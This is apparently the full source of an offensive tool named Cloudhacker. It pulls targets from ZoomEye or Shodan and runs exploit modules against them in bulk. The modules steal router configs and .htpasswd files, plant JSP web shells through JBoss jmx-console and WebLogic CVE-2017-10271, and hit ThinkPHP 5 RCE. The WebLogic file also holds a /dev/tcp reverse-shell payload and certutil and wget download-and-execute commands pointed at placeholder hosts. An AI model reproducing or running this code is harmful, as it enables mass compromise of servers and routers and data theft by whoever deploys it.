├── requirement.txt ├── cloudhacker.jpeg ├── README.md ├── dtd ├── exp ├── Iot │ ├── ruijie.py │ └── volans.py └── Web │ ├── seeyon.py │ ├── tp5_rce.py │ ├── jboss_head_rce.py │ ├── jboss_head.py │ └── Weblogic-CVE-2017-10271.py ├── lib ├── shodan_api.py ├── zoomeye.py └── banner.py └── main.py /requirement.txt: -------------------------------------------------------------------------------- 1 | gevent 2 | requests 3 | shodan 4 | tqdm 5 | -------------------------------------------------------------------------------- /cloudhacker.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuxiaokui/cloudhacker/HEAD/cloudhacker.jpeg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Cloudhacker 2 | 3 | 从zoomeye or shodan or file 获取目标进行攻击。 4 | 5 | 6 | 7 | ![](https://github.com/yuxiaokui/cloudhacker/blob/master/cloudhacker.jpeg?raw=true) 8 | -------------------------------------------------------------------------------- /dtd: -------------------------------------------------------------------------------- 1 | 2 | 3 | "> 4 | "> 5 | -------------------------------------------------------------------------------- /exp/Iot/ruijie.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | print("锐捷路由器guest用户弱口令 and 越权下载配置文件。Keyword: RSR") 4 | headers = { 5 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0", 6 | "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", 7 | "Content-Type": "text/xml", 8 | "Cookie": "iffail=no; currentURL=2.4; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=admin; c_name=" 9 | } 10 | 11 | def exp(target): 12 | host,port = target.split(':') 13 | url = 'http://' + target + "/config.text" 14 | r = requests.get(url,headers=headers) 15 | if "version" in r.text[0:44]: 16 | return url 17 | -------------------------------------------------------------------------------- /exp/Web/seeyon.py: -------------------------------------------------------------------------------- 1 | #from lib.tor import * 2 | import requests 3 | import re 4 | 5 | headers = { 6 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0", 7 | "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", 8 | "Content-Type": "text/xml" 9 | } 10 | 11 | def exp(target): 12 | host,port = target.split(':') 13 | url = 'http://' + target + '/seeyon/htmlofficeservlet' 14 | 15 | resp = requests.get( url ,timeout=3) 16 | 17 | if "DBSTEP" in resp.text and "htmoffice" in resp.text: 18 | return url + "====>" + resp.text 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /exp/Iot/volans.py: -------------------------------------------------------------------------------- 1 | #from lib.tor import * 2 | import requests 3 | import re 4 | 5 | print("飞鱼星路由器密码泄露。Keyword: volans") 6 | 7 | headers = { 8 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0", 9 | "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", 10 | "Content-Type": "text/xml" 11 | } 12 | 13 | def exp(target): 14 | host,port = target.split(':') 15 | if port == '443': 16 | url = 'https://' + target 17 | else: 18 | url = 'http://' + target 19 | 20 | 21 | 22 | target = url + "/.htpasswd" 23 | resp = requests.get( target ,timeout=5) 24 | 25 | if "admin:" in resp.text: 26 | return target + "===>" + resp.text 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /lib/shodan_api.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | 3 | class shodan_api: 4 | def __init__(self,query,start,end): 5 | self.API_KEY = "Your Key" 6 | self.query = query 7 | self.pagestart = start 8 | self.pageend = end 9 | self.api = shodan.Shodan(self.API_KEY) 10 | 11 | def run(self): 12 | data = [] 13 | 14 | rsttotal = self.api.count(self.query) 15 | maxpage = (rsttotal['total']+99)/100 16 | 17 | if self.pageend > maxpage: 18 | self.pageend = maxpage 19 | for page in range(int(self.pagestart),int(self.pageend+1)): 20 | print ("Page:",page) 21 | try: 22 | result = self.api.search(self.query,page) 23 | for res in result['matches']: 24 | #print res["port"] 25 | #print res["ip_str"] 26 | data.append(res["ip_str"] + ":" + str(res["port"])) 27 | except Exception as e: 28 | print (e) 29 | return data 30 | 31 | -------------------------------------------------------------------------------- /exp/Web/tp5_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import json 4 | 5 | headers = { 6 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0", 7 | "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", 8 | "Content-Type": "text/xml" 9 | } 10 | 11 | 12 | def getHref(url): 13 | 14 | content = requests.get(url,headers=headers).content 15 | 16 | urls = re.findall(r']+\bhref="([^"]*)"[^>]*>([\s\S]*?)',content) 17 | 18 | return urls 19 | 20 | 21 | 22 | 23 | def exp(target): 24 | host,port = target.split(':') 25 | if port == '443': 26 | url = 'https://' + target 27 | else: 28 | url = 'http://' + target 29 | 30 | ctrl = getHref(url)[0][0].split('/')[1] or 'index' 31 | print(ctrl) 32 | 33 | target = url + "/index.php?s=" + ctrl +'/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=xi4okv' 34 | resp = requests.get( target ,timeout=3) 35 | if "a82cdb4a8d309bc72bd1df8ecfa2aa8f" in resp.text: 36 | return target 37 | 38 | target = url + "/index.php?s=" + ctrl +'/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=xi4okv' 39 | resp = requests.get( target ,timeout=3) 40 | if "a82cdb4a8d309bc72bd1df8ecfa2aa8f" in resp.text: 41 | return target 42 | 43 | target = url + "/?s=captcha" 44 | resp = requests.post( target ,data=json.loads({"_method":"__construct","filter":"print_r","id":"xi4okv"}),timeout=5) 45 | if "xi4okv" in resp.text: 46 | return target 47 | -------------------------------------------------------------------------------- /exp/Web/jboss_head_rce.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import requests 3 | 4 | def exp(target): 5 | url = target 6 | target = target.split(":") 7 | target = (target[0], int(target[1])) 8 | exp = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=demo.war&argType=java.lang.String&arg1=404&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%62%6a%68%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%62%6a%68%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%62%6a%68%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20&argType=boolean&arg4=True HTTP/1.0\r\n\r\n" 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((target)) 11 | s.send(exp.encode(encoding="utf-8")) 12 | s.close 13 | 14 | r = requests.get("http://" + url + "/demo/404.jsp?bjh=whoami", timeout=3) 15 | if r.status_code == 200: 16 | if "Command:" in r.text: 17 | return "http://" + url + "/demo/404.jsp ==============> OK" 18 | return False 19 | -------------------------------------------------------------------------------- /exp/Web/jboss_head.py: -------------------------------------------------------------------------------- 1 | #from lib.tor import * 2 | import socket 3 | import requests 4 | 5 | def exp(target): 6 | url = target 7 | target = target.split(":") 8 | target = (target[0], int(target[1])) 9 | exp = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=demo.war&argType=java.lang.String&arg1=404&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%62%6a%68%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%62%6a%68%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%62%6a%68%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20&argType=boolean&arg4=True HTTP/1.0\r\n\r\n" 10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 11 | s.connect((target)) 12 | s.send(exp.encode(encoding="utf-8")) 13 | s.close 14 | 15 | r = requests.get("http://" + url + "/demo/404.jsp?bjh=whoami", timeout=3) 16 | if r.status_code == 200: 17 | if "Command:" in r.text: 18 | return "http://" + url + "/demo/404.jsp ==============> OK" 19 | return False 20 | 21 | -------------------------------------------------------------------------------- /lib/zoomeye.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import os 4 | 5 | class zoomeye: 6 | def __init__(self, keyword, from_page,end_page): 7 | self.username = "" 8 | self.password = "" 9 | self.access_token = '' 10 | self.headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0", "Content-Type":"application/json"} 11 | self.keyword = keyword 12 | self.from_page = int(from_page) 13 | self.end_page = int(end_page) + 1 14 | self.targets = [] 15 | 16 | def get_access_token(self): 17 | login_url = "https://api.zoomeye.org/user/login" 18 | data = '{"username": "%s", "password": "%s"\ 19 | }' % (self.username, self.password) 20 | r = requests.post(login_url,data=data) 21 | self.access_token = r.text[18:-2] 22 | return self.access_token 23 | 24 | def get_info(self): 25 | if not self.access_token: 26 | self.get_access_token() 27 | info_url = "https://api.zoomeye.org/resources-info" 28 | self.headers["Authorization"] = "JWT " + self.access_token 29 | r = requests.get(info_url, headers=self.headers) 30 | return r.text 31 | 32 | def run(self): 33 | if not self.access_token: 34 | self.get_access_token() 35 | for n in range(self.from_page, self.end_page): 36 | print ("page:",n) 37 | search_url = "https://api.zoomeye.org/host/search?query=%s&page=%s\ 38 | " % (self.keyword, str(n)) 39 | self.headers["Authorization"] = "JWT " + self.access_token 40 | r = requests.get(search_url, headers=self.headers) 41 | result = json.loads(r.text) 42 | for i in result['matches']: 43 | target = i['ip'] + ":" + str(i['portinfo']['port']) 44 | 45 | self.targets.append(target) 46 | return self.targets 47 | 48 | def run_web(self): 49 | if not self.access_token: 50 | self.get_access_token() 51 | for n in range(self.from_page, self.end_page): 52 | search_url = "https://api.zoomeye.org/web/search?query=%s&page=%s\ 53 | " % (self.keyword, str(n)) 54 | self.headers["Authorization"] = "JWT " + self.access_token 55 | r = requests.get(search_url, headers=self.headers) 56 | result = r.text 57 | result = json.loads(result) 58 | try: 59 | for i in result['matches']: 60 | target = i["site"] 61 | self.targets.append(target) 62 | except: 63 | pass 64 | return self.targets 65 | 66 | -------------------------------------------------------------------------------- /exp/Web/Weblogic-CVE-2017-10271.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | headers = { 4 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0", 5 | "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", 6 | "Content-Type": "text/xml" 7 | } 8 | 9 | 10 | payload = ''' 11 | 13 | servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/demo.jsp 14 | 
");
19 |         while((a=in.read(b))!=-1){
20 |             out.println(new String(b));
21 |         }
22 |         out.print("
"); 23 | } %>]]> 24 | 25 | ''' 26 | 27 | payload_shell = ''' 28 | 30 | servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.sh 31 | & /dev/tcp/xxx/xxx 0>&1]]> 32 | 33 | ''' 34 | 35 | 36 | 37 | 38 | def exp(target): 39 | url = 'http://' + target + '/wls-wsat/CoordinatorPortType11' 40 | resp = requests.post(url, data=payload, headers=headers, timeout=5) # attack 41 | 42 | url = 'http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=whoami' 43 | resp = requests.get(url, timeout=5) 44 | if resp.status_code == 200 and "xi4okv" in resp.text: 45 | print ("\n" + url + "===>" + resp.text[0:20]) 46 | 47 | 48 | 49 | ''' 50 | if resp.status_code == 200: 51 | if "xi4okv" in resp.text: 52 | print "\n" + url + "===>" + resp.text[0:20] 53 | 54 | cmd = "certutil.exe -urlcache -split -f http://xxxx/smss.exe" 55 | run = "smss.exe" 56 | requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + cmd, timeout=5) 57 | requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + run, timeout=5) 58 | 59 | cmd = "wget http://xxxxx/error.py" 60 | run = "python error.py" 61 | 62 | requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + cmd, timeout=5) 63 | requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + run, timeout=5) 64 | ''' 65 | 66 | 67 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | from gevent import monkey;monkey.patch_all() 4 | import queue 5 | import sys 6 | import requests 7 | from lib.zoomeye import * 8 | from lib.banner import * 9 | from lib.shodan_api import * 10 | import time 11 | import json 12 | import importlib 13 | import os 14 | from tqdm import tqdm 15 | from gevent.queue import PriorityQueue 16 | import gevent 17 | 18 | 19 | class AutoHack(): 20 | def __init__(self, zoomeye_results, threads_num): 21 | self.threads_num = threads_num 22 | self.targets = PriorityQueue() 23 | self.zoomeye_results = zoomeye_results 24 | self.result = [] 25 | 26 | for zoomeye_result in zoomeye_results: 27 | self.targets.put(zoomeye_result) 28 | self.total = self.targets.qsize() 29 | self.pbar = tqdm(total=self.total,ascii=True) 30 | 31 | 32 | def check(self): 33 | while self.targets.qsize() > 0: 34 | target = self.targets.get().strip() 35 | try: 36 | self.pbar.update(1) 37 | result = exp.exp(target) 38 | if result: 39 | self.result.append(result) 40 | except Exception as e: 41 | #print(e) 42 | pass 43 | 44 | 45 | def run(self): 46 | threads = [gevent.spawn(self.check) for i in range(self.threads_num)] 47 | try: 48 | gevent.joinall(threads) 49 | except KeyboardInterrupt as e: 50 | print ('[WARNING] User aborted') 51 | for res in self.result: 52 | print (res) 53 | self.pbar.close() 54 | print ("Hack it!") 55 | for res in self.result: 56 | print (res) 57 | print("Found ",len(self.result)) 58 | print ("End!") 59 | 60 | if __name__ == '__main__': 61 | 62 | banner() 63 | 64 | n = 1 65 | host = ['Server','Web','Iot'] 66 | for t in host: 67 | print (n,'====>',t) 68 | n += 1 69 | 70 | target = input("Target Select:") 71 | 72 | 73 | m = 1 74 | pocs = [] 75 | for poc in os.listdir('./exp/' + host[int(target)-1]): 76 | if poc[-3:] == ".py" and poc != "__init__.py": 77 | print (m,'====>',poc) 78 | pocs.append(poc) 79 | m += 1 80 | 81 | flag = input("Exp Select:") 82 | 83 | exp = importlib.import_module('exp.' + host[int(target)-1] + '.' + pocs[int(flag) - 1][:-3]) 84 | 85 | 86 | api_select = input("Zoomeye or Shodan or File (z/s/f):") 87 | if api_select == 'f': 88 | f = input("File:") 89 | with open(f) as x: 90 | targets = x.readlines() 91 | else: 92 | query = input("Query:") 93 | start = int(input("Start_page:")) 94 | end = int(input("End_page:")) 95 | 96 | if api_select == 'z': 97 | p = zoomeye(query, start, end) 98 | if api_select == 's': 99 | p = shodan_api(query, start, end) 100 | 101 | targets = p.run() 102 | 103 | print ("[+]Now get targets .........") 104 | print ("[+]Get %d targets OK!" % len(targets)) 105 | print ("[+]Now check targets .........") 106 | q = AutoHack(targets, threads_num=10) 107 | q.run() 108 | 109 | -------------------------------------------------------------------------------- /lib/banner.py: -------------------------------------------------------------------------------- 1 | def banner1(): 2 | print (''' 3 | ######## # 4 | ################# # 5 | ###################### # 6 | ######################### # 7 | ############################ 8 | ############################## 9 | ############################### 10 | ############################### 11 | ############################## 12 | # ######## # 13 | \033[1;35m ## \033[0m \033[1;35m ### \033[0m #### ## 14 | ### ### 15 | #### ### 16 | #### ########## #### 17 | ####################### #### 18 | #################### #### 19 | ################## #### 20 | ############ ## 21 | ######## ### 22 | ######### ##### 23 | ############ ###### 24 | ######## ######### 25 | ##### ######## 26 | ### ######### 27 | ###### ############ 28 | ####################### 29 | # # ### # # ## 30 | ######################## 31 | ## ## ## ## 32 | 33 | 34 | ''') 35 | def banner2(): 36 | print (''' 37 | ### #### ### ### 38 | ### #### ### ### ### 39 | ### #### ### ### ### 40 | ### #### ### ### ### 41 | ### #### ####### ###### ### #### ### ###### 42 | ### #### ######### ######### ### #### ### ###### 43 | ################# ### #### ### ####### ### ### 44 | ############# ### #### ###### ### ### 45 | ### #### ############ ###### ### ### 46 | ### #### ############# ###### ### ### 47 | ### ######## ####### ####### ### ### 48 | ### ####### ######## ### #### ### ### 49 | ### ######## ##### #### ### ### ### ### ### 50 | ### #### ########## ######### ### #### ### ##### 51 | ### #### ######### ###### ### #### ### #### 52 | ''') 53 | 54 | 55 | def banner3(): 56 | print (''' 57 | ______________________________________________________________________________ 58 | | | 59 | | Xi4oKv SuperHack Sytem V1.0 Login | 60 | |______________________________________________________________________________| 61 | | | 62 | | | 63 | | | 64 | | User Name: [ \033[1;31m Xi4okv \033[0m ] | 65 | | | 66 | | Password: [ ] | 67 | | | 68 | | | 69 | | | 70 | | [ OK ] | 71 | |______________________________________________________________________________| 72 | | | 73 | | https://wooyun.top | 74 | |______________________________________________________________________________| 75 | 76 | ''') 77 | 78 | def banner4(): 79 | print (''' 80 | 81 | (`. ,-, 82 | ` `. ,;' / 83 | `. ,'/ .' 84 | `. X /.' 85 | .-;--''--.._` ` ( 86 | .' / ` 87 | , ` ' \033[1;31m Q \033[0m' 88 | , , `._ \\ 89 | ,.| ' `-.;_' 90 | : . ` ; ` ` --,.._; 91 | ' ` , ) .' 92 | `._ , ' /_ 93 | ; ,''-,;' ``- 94 | ``-..__``--` 95 | 96 | 97 | ''') 98 | import random 99 | def banner(): 100 | bannerList = ["banner1","banner2","banner3","banner4"] 101 | eval( random.choice(bannerList) + "()") 102 | 103 | 104 | def help(): 105 | print (''' 106 | Show exploit. 107 | Use exploit. 108 | Set options. 109 | Hack it. 110 | 111 | ''') 112 | --------------------------------------------------------------------------------